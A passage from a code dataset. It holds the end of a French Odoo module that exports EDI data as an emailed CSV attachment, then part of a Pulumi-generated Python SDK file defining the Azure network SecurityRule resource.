lig=row[0]+'\t'+row[1]+'\t'+row[2]+'\t'+row[3]+'\t'+str(row[4])+'\t'+row[5]+'\t'+str(row[6])+'\n'
datas=datas+lig
#** Ajout en pièce jointe ******************************************
name='export-edi-'+obj.name+'.csv'
attachment_obj = self.env['ir.attachment']
model=self._name
attachments = attachment_obj.search([('res_model','=',model),('res_id','=',obj.id),('name','=',name)]).unlink()
vals = {
'name': name,
'datas_fname': name,
'type': 'binary',
'file_type': 'text/csv',
'res_model': model,
'res_id': obj.id,
'datas': datas.encode('base64'),
}
attachment_obj.create(vals)
self.set_histo(obj.id, 'Création fichier EDI')
#*******************************************************************
@api.multi
def envoyer_par_mail_action(self):
for obj in self:
self.envoi_mail()
self.set_histo(obj.id, u"Envoie par mail du fichier d'EDI à "+obj.contact_id.email)
@api.multi
def set_histo(self, edi_id, description):
vals={
'edi_id' : edi_id,
'description': description,
}
histo=self.env['is.export.edi.histo'].create(vals)
@api.multi
def envoi_mail(self):
for obj in self:
email_to=obj.contact_id.email
if email_to==False:
raise Warning(u"Mail non renseigné pour ce contact !")
user = self.env['res.users'].browse(self._uid)
email = user.email
nom = user.name
if email==False:
raise Warning(u"Votre mail n'est pas renseigné !")
if email:
attachment_id = self.env['ir.attachment'].search([
('res_model','=','is.export.edi'),
('res_id' ,'=',obj.id),
])
body_html=u"""
<html>
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
</head>
<body>
<p>Bonjour, </p>
<p>Ci-joint le fichier d'EDI à traiter</p>
</body>
</html>
"""
email_vals={
'subject' : "[EDI] "+obj.name,
'email_to' : email_to,
'email_cc' : email,
'email_from' : email,
'body_html' : body_html.encode('utf-8'),
'attachment_ids': [(6, 0, [attachment_id.id])]
}
email_id=self.env['mail.mail'].create(email_vals)
self.env['mail.mail'].send(email_id)
class is_export_edi_histo(models.Model):
_name='is.export.edi.histo'
_order='name desc'
edi_id = fields.Many2one('is.export.edi', 'Export EDI', required=True, ondelete='cascade', readonly=True)
name = fields.Datetime("Date")
user_id = fields.Many2one('res.users', 'Utilisateur')
description = fields.Char("Opération éffectuée")
_defaults = {
'name' : lambda *a: fields.datetime.now(),
'user_id': lambda obj, cr, uid, context: uid,
}
| 38.070352
| 123
| 0.48614
|
794fd52e532728401e3e2805bb759c96d73361be
| 40,041
|
py
|
Python
|
sdk/python/pulumi_azure_native/network/v20200401/security_rule.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200401/security_rule.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200401/security_rule.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['SecurityRuleArgs', 'SecurityRule']
@pulumi.input_type
class SecurityRuleArgs:
def __init__(__self__, *,
access: pulumi.Input[Union[str, 'SecurityRuleAccess']],
direction: pulumi.Input[Union[str, 'SecurityRuleDirection']],
network_security_group_name: pulumi.Input[str],
protocol: pulumi.Input[Union[str, 'SecurityRuleProtocol']],
resource_group_name: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
destination_address_prefix: Optional[pulumi.Input[str]] = None,
destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
destination_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]]] = None,
destination_port_range: Optional[pulumi.Input[str]] = None,
destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
security_rule_name: Optional[pulumi.Input[str]] = None,
source_address_prefix: Optional[pulumi.Input[str]] = None,
source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]]] = None,
source_port_range: Optional[pulumi.Input[str]] = None,
source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a SecurityRule resource.
:param pulumi.Input[Union[str, 'SecurityRuleAccess']] access: The network traffic is allowed or denied.
:param pulumi.Input[Union[str, 'SecurityRuleDirection']] direction: The direction of the rule. The direction specifies if rule will be evaluated on incoming or outgoing traffic.
:param pulumi.Input[str] network_security_group_name: The name of the network security group.
:param pulumi.Input[Union[str, 'SecurityRuleProtocol']] protocol: Network protocol this rule applies to.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] description: A description for this rule. Restricted to 140 chars.
:param pulumi.Input[str] destination_address_prefix: The destination address prefix. CIDR or destination IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used.
:param pulumi.Input[Sequence[pulumi.Input[str]]] destination_address_prefixes: The destination address prefixes. CIDR or destination IP ranges.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]] destination_application_security_groups: The application security group specified as destination.
:param pulumi.Input[str] destination_port_range: The destination port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] destination_port_ranges: The destination port ranges.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] name: The name of the resource that is unique within a resource group. This name can be used to access the resource.
:param pulumi.Input[int] priority: The priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule.
:param pulumi.Input[str] security_rule_name: The name of the security rule.
:param pulumi.Input[str] source_address_prefix: The CIDR or source IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used. If this is an ingress rule, specifies where network traffic originates from.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_address_prefixes: The CIDR or source IP ranges.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]] source_application_security_groups: The application security group specified as source.
:param pulumi.Input[str] source_port_range: The source port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_port_ranges: The source port ranges.
"""
pulumi.set(__self__, "access", access)
pulumi.set(__self__, "direction", direction)
pulumi.set(__self__, "network_security_group_name", network_security_group_name)
pulumi.set(__self__, "protocol", protocol)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if description is not None:
pulumi.set(__self__, "description", description)
if destination_address_prefix is not None:
pulumi.set(__self__, "destination_address_prefix", destination_address_prefix)
if destination_address_prefixes is not None:
pulumi.set(__self__, "destination_address_prefixes", destination_address_prefixes)
if destination_application_security_groups is not None:
pulumi.set(__self__, "destination_application_security_groups", destination_application_security_groups)
if destination_port_range is not None:
pulumi.set(__self__, "destination_port_range", destination_port_range)
if destination_port_ranges is not None:
pulumi.set(__self__, "destination_port_ranges", destination_port_ranges)
if id is not None:
pulumi.set(__self__, "id", id)
if name is not None:
pulumi.set(__self__, "name", name)
if priority is not None:
pulumi.set(__self__, "priority", priority)
if security_rule_name is not None:
pulumi.set(__self__, "security_rule_name", security_rule_name)
if source_address_prefix is not None:
pulumi.set(__self__, "source_address_prefix", source_address_prefix)
if source_address_prefixes is not None:
pulumi.set(__self__, "source_address_prefixes", source_address_prefixes)
if source_application_security_groups is not None:
pulumi.set(__self__, "source_application_security_groups", source_application_security_groups)
if source_port_range is not None:
pulumi.set(__self__, "source_port_range", source_port_range)
if source_port_ranges is not None:
pulumi.set(__self__, "source_port_ranges", source_port_ranges)
@property
@pulumi.getter
def access(self) -> pulumi.Input[Union[str, 'SecurityRuleAccess']]:
"""
The network traffic is allowed or denied.
"""
return pulumi.get(self, "access")
@access.setter
def access(self, value: pulumi.Input[Union[str, 'SecurityRuleAccess']]):
pulumi.set(self, "access", value)
@property
@pulumi.getter
def direction(self) -> pulumi.Input[Union[str, 'SecurityRuleDirection']]:
"""
The direction of the rule. The direction specifies if rule will be evaluated on incoming or outgoing traffic.
"""
return pulumi.get(self, "direction")
@direction.setter
def direction(self, value: pulumi.Input[Union[str, 'SecurityRuleDirection']]):
pulumi.set(self, "direction", value)
@property
@pulumi.getter(name="networkSecurityGroupName")
def network_security_group_name(self) -> pulumi.Input[str]:
"""
The name of the network security group.
"""
return pulumi.get(self, "network_security_group_name")
@network_security_group_name.setter
def network_security_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "network_security_group_name", value)
@property
@pulumi.getter
def protocol(self) -> pulumi.Input[Union[str, 'SecurityRuleProtocol']]:
"""
Network protocol this rule applies to.
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: pulumi.Input[Union[str, 'SecurityRuleProtocol']]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for this rule. Restricted to 140 chars.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="destinationAddressPrefix")
def destination_address_prefix(self) -> Optional[pulumi.Input[str]]:
"""
The destination address prefix. CIDR or destination IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used.
"""
return pulumi.get(self, "destination_address_prefix")
@destination_address_prefix.setter
def destination_address_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "destination_address_prefix", value)
@property
@pulumi.getter(name="destinationAddressPrefixes")
def destination_address_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The destination address prefixes. CIDR or destination IP ranges.
"""
return pulumi.get(self, "destination_address_prefixes")
@destination_address_prefixes.setter
def destination_address_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "destination_address_prefixes", value)
@property
@pulumi.getter(name="destinationApplicationSecurityGroups")
def destination_application_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]]]:
"""
The application security group specified as destination.
"""
return pulumi.get(self, "destination_application_security_groups")
@destination_application_security_groups.setter
def destination_application_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]]]):
pulumi.set(self, "destination_application_security_groups", value)
@property
@pulumi.getter(name="destinationPortRange")
def destination_port_range(self) -> Optional[pulumi.Input[str]]:
"""
The destination port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
"""
return pulumi.get(self, "destination_port_range")
@destination_port_range.setter
def destination_port_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "destination_port_range", value)
@property
@pulumi.getter(name="destinationPortRanges")
def destination_port_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The destination port ranges.
"""
return pulumi.get(self, "destination_port_ranges")
@destination_port_ranges.setter
def destination_port_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "destination_port_ranges", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource that is unique within a resource group. This name can be used to access the resource.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[int]]:
"""
The priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter(name="securityRuleName")
def security_rule_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the security rule.
"""
return pulumi.get(self, "security_rule_name")
@security_rule_name.setter
def security_rule_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "security_rule_name", value)
@property
@pulumi.getter(name="sourceAddressPrefix")
def source_address_prefix(self) -> Optional[pulumi.Input[str]]:
"""
The CIDR or source IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used. If this is an ingress rule, specifies where network traffic originates from.
"""
return pulumi.get(self, "source_address_prefix")
@source_address_prefix.setter
def source_address_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_address_prefix", value)
@property
@pulumi.getter(name="sourceAddressPrefixes")
def source_address_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The CIDR or source IP ranges.
"""
return pulumi.get(self, "source_address_prefixes")
@source_address_prefixes.setter
def source_address_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "source_address_prefixes", value)
@property
@pulumi.getter(name="sourceApplicationSecurityGroups")
def source_application_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]]]:
"""
The application security group specified as source.
"""
return pulumi.get(self, "source_application_security_groups")
@source_application_security_groups.setter
def source_application_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]]]):
pulumi.set(self, "source_application_security_groups", value)
@property
@pulumi.getter(name="sourcePortRange")
def source_port_range(self) -> Optional[pulumi.Input[str]]:
"""
The source port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
"""
return pulumi.get(self, "source_port_range")
@source_port_range.setter
def source_port_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_port_range", value)
@property
@pulumi.getter(name="sourcePortRanges")
def source_port_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The source port ranges.
"""
return pulumi.get(self, "source_port_ranges")
@source_port_ranges.setter
def source_port_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "source_port_ranges", value)
class SecurityRule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access: Optional[pulumi.Input[Union[str, 'SecurityRuleAccess']]] = None,
description: Optional[pulumi.Input[str]] = None,
destination_address_prefix: Optional[pulumi.Input[str]] = None,
destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
destination_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]]] = None,
destination_port_range: Optional[pulumi.Input[str]] = None,
destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
direction: Optional[pulumi.Input[Union[str, 'SecurityRuleDirection']]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_security_group_name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[Union[str, 'SecurityRuleProtocol']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
security_rule_name: Optional[pulumi.Input[str]] = None,
source_address_prefix: Optional[pulumi.Input[str]] = None,
source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]]] = None,
source_port_range: Optional[pulumi.Input[str]] = None,
source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Network security rule.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Union[str, 'SecurityRuleAccess']] access: The network traffic is allowed or denied.
:param pulumi.Input[str] description: A description for this rule. Restricted to 140 chars.
:param pulumi.Input[str] destination_address_prefix: The destination address prefix. CIDR or destination IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used.
:param pulumi.Input[Sequence[pulumi.Input[str]]] destination_address_prefixes: The destination address prefixes. CIDR or destination IP ranges.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]] destination_application_security_groups: The application security group specified as destination.
:param pulumi.Input[str] destination_port_range: The destination port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] destination_port_ranges: The destination port ranges.
:param pulumi.Input[Union[str, 'SecurityRuleDirection']] direction: The direction of the rule. The direction specifies if rule will be evaluated on incoming or outgoing traffic.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] name: The name of the resource that is unique within a resource group. This name can be used to access the resource.
:param pulumi.Input[str] network_security_group_name: The name of the network security group.
:param pulumi.Input[int] priority: The priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule.
:param pulumi.Input[Union[str, 'SecurityRuleProtocol']] protocol: Network protocol this rule applies to.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] security_rule_name: The name of the security rule.
:param pulumi.Input[str] source_address_prefix: The CIDR or source IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used. If this is an ingress rule, specifies where network traffic originates from.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_address_prefixes: The CIDR or source IP ranges.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]] source_application_security_groups: The application security group specified as source.
:param pulumi.Input[str] source_port_range: The source port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_port_ranges: The source port ranges.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SecurityRuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Network security rule.
:param str resource_name: The name of the resource.
:param SecurityRuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SecurityRuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access: Optional[pulumi.Input[Union[str, 'SecurityRuleAccess']]] = None,
description: Optional[pulumi.Input[str]] = None,
destination_address_prefix: Optional[pulumi.Input[str]] = None,
destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
destination_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]]] = None,
destination_port_range: Optional[pulumi.Input[str]] = None,
destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
direction: Optional[pulumi.Input[Union[str, 'SecurityRuleDirection']]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_security_group_name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[Union[str, 'SecurityRuleProtocol']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
security_rule_name: Optional[pulumi.Input[str]] = None,
source_address_prefix: Optional[pulumi.Input[str]] = None,
source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]]] = None,
source_port_range: Optional[pulumi.Input[str]] = None,
source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SecurityRuleArgs.__new__(SecurityRuleArgs)
if access is None and not opts.urn:
raise TypeError("Missing required property 'access'")
__props__.__dict__["access"] = access
__props__.__dict__["description"] = description
__props__.__dict__["destination_address_prefix"] = destination_address_prefix
__props__.__dict__["destination_address_prefixes"] = destination_address_prefixes
__props__.__dict__["destination_application_security_groups"] = destination_application_security_groups
__props__.__dict__["destination_port_range"] = destination_port_range
__props__.__dict__["destination_port_ranges"] = destination_port_ranges
if direction is None and not opts.urn:
raise TypeError("Missing required property 'direction'")
__props__.__dict__["direction"] = direction
__props__.__dict__["id"] = id
__props__.__dict__["name"] = name
if network_security_group_name is None and not opts.urn:
raise TypeError("Missing required property 'network_security_group_name'")
__props__.__dict__["network_security_group_name"] = network_security_group_name
__props__.__dict__["priority"] = priority
if protocol is None and not opts.urn:
raise TypeError("Missing required property 'protocol'")
__props__.__dict__["protocol"] = protocol
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["security_rule_name"] = security_rule_name
__props__.__dict__["source_address_prefix"] = source_address_prefix
__props__.__dict__["source_address_prefixes"] = source_address_prefixes
__props__.__dict__["source_application_security_groups"] = source_application_security_groups
__props__.__dict__["source_port_range"] = source_port_range
__props__.__dict__["source_port_ranges"] = source_port_ranges
__props__.__dict__["etag"] = None
__props__.__dict__["provisioning_state"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/v20200401:SecurityRule"), pulumi.Alias(type_="azure-native:network:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20150501preview:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20150501preview:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20150615:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20150615:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20160330:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20160330:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20160601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20160601:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20160901:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20160901:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20161201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20161201:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20170301:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170301:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20170601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170601:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20170801:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170801:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20170901:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170901:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20171001:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20171001:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20171101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20171101:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20180101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180101:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20180201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180201:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20180401:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180401:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20180601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180601:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20180701:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180701:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20180801:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180801:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20181001:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20181001:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20181101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20181101:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20181201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20181201:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20190201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190201:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20190401:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190401:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20190601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190601:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20190701:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190701:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20190801:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190801:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20190901:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190901:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20191101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20191101:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20191201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20191201:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20200301:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200301:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20200501:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200501:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20200601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200601:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20200701:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200701:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20200801:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200801:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20201101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20201101:SecurityRule")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(SecurityRule, __self__).__init__(
'azure-native:network/v20200401:SecurityRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'SecurityRule':
"""
Get an existing SecurityRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = SecurityRuleArgs.__new__(SecurityRuleArgs)
__props__.__dict__["access"] = None
__props__.__dict__["description"] = None
__props__.__dict__["destination_address_prefix"] = None
__props__.__dict__["destination_address_prefixes"] = None
__props__.__dict__["destination_application_security_groups"] = None
__props__.__dict__["destination_port_range"] = None
__props__.__dict__["destination_port_ranges"] = None
__props__.__dict__["direction"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["priority"] = None
__props__.__dict__["protocol"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["source_address_prefix"] = None
__props__.__dict__["source_address_prefixes"] = None
__props__.__dict__["source_application_security_groups"] = None
__props__.__dict__["source_port_range"] = None
__props__.__dict__["source_port_ranges"] = None
return SecurityRule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def access(self) -> pulumi.Output[str]:
"""
The network traffic is allowed or denied.
"""
return pulumi.get(self, "access")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description for this rule. Restricted to 140 chars.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="destinationAddressPrefix")
def destination_address_prefix(self) -> pulumi.Output[Optional[str]]:
"""
The destination address prefix. CIDR or destination IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used.
"""
return pulumi.get(self, "destination_address_prefix")
@property
@pulumi.getter(name="destinationAddressPrefixes")
def destination_address_prefixes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The destination address prefixes. CIDR or destination IP ranges.
"""
return pulumi.get(self, "destination_address_prefixes")
@property
